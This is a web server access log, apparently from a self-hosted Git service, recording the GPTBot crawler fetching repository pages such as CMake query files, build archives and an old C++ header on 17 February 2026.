"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:17:31:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11346] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:17:31:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11345] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:17:31:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10305] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1" +[17/Feb/2026:17:31:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9999] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:17:31:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 10003] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:17:31:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api" +[17/Feb/2026:17:31:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake" +[17/Feb/2026:17:31:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 10002] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:17:31:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9997] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:17:31:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10258] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:17:31:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:17:31:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:17:31:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10260] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:17:31:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9970] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:17:31:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11346] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:17:31:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:17:31:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:17:31:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10259] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:17:31:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10259] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:17:31:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9973] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:17:31:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9974] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:17:31:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9973] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:17:31:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9973] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:17:31:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9951] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/query" +[17/Feb/2026:17:31:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9952] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/query" +[17/Feb/2026:17:31:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10266] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:17:31:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:17:31:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9980] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:17:31:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9952] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/query" +[17/Feb/2026:17:31:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9953] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/query" +[17/Feb/2026:17:31:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9949] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1" +[17/Feb/2026:17:31:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 9897] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:17:31:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 1037] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:17:31:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 10741] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:17:31:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:17:31:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 10008] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:17:31:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10694] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1" +[17/Feb/2026:17:31:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/App.tsx?display=rendered" [Client 74.7.227.38] [Length 11078] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/App.tsx" +[17/Feb/2026:17:31:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 10930] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" +[17/Feb/2026:17:31:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 10930] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" +[17/Feb/2026:17:31:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 10926] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" +[17/Feb/2026:17:31:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 10930] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" +[17/Feb/2026:17:31:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 10955] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" +[17/Feb/2026:17:31:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 10900] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" +[17/Feb/2026:17:31:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:17:31:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:17:31:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:17:31:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:17:31:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/query" +[17/Feb/2026:17:31:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr 